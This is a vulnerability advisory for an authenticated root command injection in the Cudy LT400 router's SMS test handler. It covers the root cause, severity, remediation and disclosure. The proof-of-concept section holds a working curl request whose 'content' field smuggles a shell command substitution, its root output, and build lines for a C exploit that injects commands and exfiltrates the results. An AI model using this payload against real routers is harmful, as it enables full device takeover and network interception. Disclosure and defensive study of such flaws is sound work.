## https://sploitus.com/exploit?id=53F5E36D-6808-5272-9FCC-3FD96158324F
# Cudy LT400 โ Authenticated Root OS Command Injection in `luci-app-gcom` (SMS "send test")
**Class:** CWE-78 โ OS Command Injection
**Impact:** Arbitrary command execution as **root** (full device compromise)
**Affected:** Cudy LT400, firmware **1.15.27** (LEDE/OpenWrt 17.01.5), HW rev LT400A R6
**Component:** `/usr/lib/lua/luci/controller/gcom.lua` โ `action_send_test`
**Endpoint:** `POST /cgi-bin/luci/admin/network/gcom/sms/sendtest` (params `content`, `phone`)
**Discovered by:** archnexus707 ยท 2026 ยท responsibly disclosed to Cudy
---
## Summary
The Cudy LT400 4G LTE router runs a vendor-customised LEDE/OpenWrt 17.01.5 image with a
LuCI web interface. Cudy's proprietary `luci-app-gcom` package contains an OS command
injection in its SMS *send test message* handler. The HTTP parameters `content` and
`phone` are interpolated โ without adequate sanitisation โ into a `/bin/sh` pipeline run
via `luci.util.exec()`. Because `uhttpd` runs as **root**, an authenticated administrator
achieves arbitrary command execution as root.
## Root cause
Reconstructed `action_send_test` (controller ships as Lua bytecode; logic recovered from
string constants):
```lua
local content = "[Cudy]" .. luci.http.formvalue("content") -- attacker-controlled
content = content:gsub('"', '') -- only double quotes removed (INSUFFICIENT)
luci.util.exec(string.format(
'echo -n "%s" | iconv -f UTF-8 -t UCS-2LE | hexdump ...', content)) -- SHELL SINK
```
The only neutralisation is removing the `"` character. The value is then placed inside a
**double-quoted** shell word: `echo -n ""`. In POSIX `sh`, command substitution
`$(...)` and back-ticks are **still evaluated inside double quotes**, so a payload of
`content=$(id)` executes `id`. No quote breakout is required, making the quote-stripping
ineffective. Both `content` and `phone` reach the shell and are injectable.
## Proof of concept
> Authorised testing only โ against devices you own or are authorised to assess.
```bash
# After authenticating to LuCI and obtaining the session cookie + CSRF token:
curl -s -b "sysauth=$COOKIE" \
--data-urlencode "token=$TOKEN" \
--data-urlencode "iface=4g" \
--data-urlencode "phone=10086" \
--data-urlencode 'content=$({ id; uname -a; } > /www/poc.txt 2>&1)' \
"http:///cgi-bin/luci/admin/network/gcom/sms/sendtest"
curl -s "http:///poc.txt"
# -> uid=0(root) gid=0(root)
# Linux LT400 4.4.140 ... mips GNU/Linux
```
A self-contained C exploit is provided: [`cudy_lt400_gcom_rce.c`](./cudy_lt400_gcom_rce.c)
(raw sockets, no dependencies). It logs in, lifts the CSRF token, injects a command,
exfiltrates output, and cleans up.
```
gcc -O2 -D_GNU_SOURCE -o cudy_rce cudy_lt400_gcom_rce.c
./cudy_rce "id; uname -a"
```
## Impact
Complete root compromise of the device. As the network gateway it enables traffic
interception/manipulation, DNS/credential harvesting, persistent backdoors, LAN pivoting,
modem/SIM/SMS abuse, and denial of service.
## Severity
- **CVSS v3.1:** 7.2 (High) โ `CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H`
- **CVSS v4.0:** `CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N`
## Remediation
Do not pass user input into a shell. Encode the SMS body via an argument-vector API or
feed `iconv` from stdin/a temp file rather than `echo -n "..."`. If a shell is
unavoidable, strictly allow-list SMS content and escape `$()`, back-ticks, `\`, `;`, `|`,
`&`, and newlines (stripping `"` alone is insufficient). Audit the sibling
`action_send_sms` (`AT+CMGW="%s"` from `phone`) for AT-command injection. Drop
`uhttpd`/CGI privileges from root where feasible.
## Differentiation from prior art
- โ **CVE-2024-39209** (`luci-app-sms-tool`, a different community package).
- โ **CVE-2026-4537** (Cudy **TR1200** `ipsec.lua` `action_ipsec_conn` โ different
product/controller/function). Same *class*, separate instance.
- Public Cudy LT400 CVEs to date are XSS (e.g. CVE-2023-31852), not command injection in
the gcom/SMS path.
## Disclosure
Reported to Cudy (`support@cudy.com`) under coordinated disclosure; CVE ID requested via
MITRE CNA-LR. 90-day disclosure window.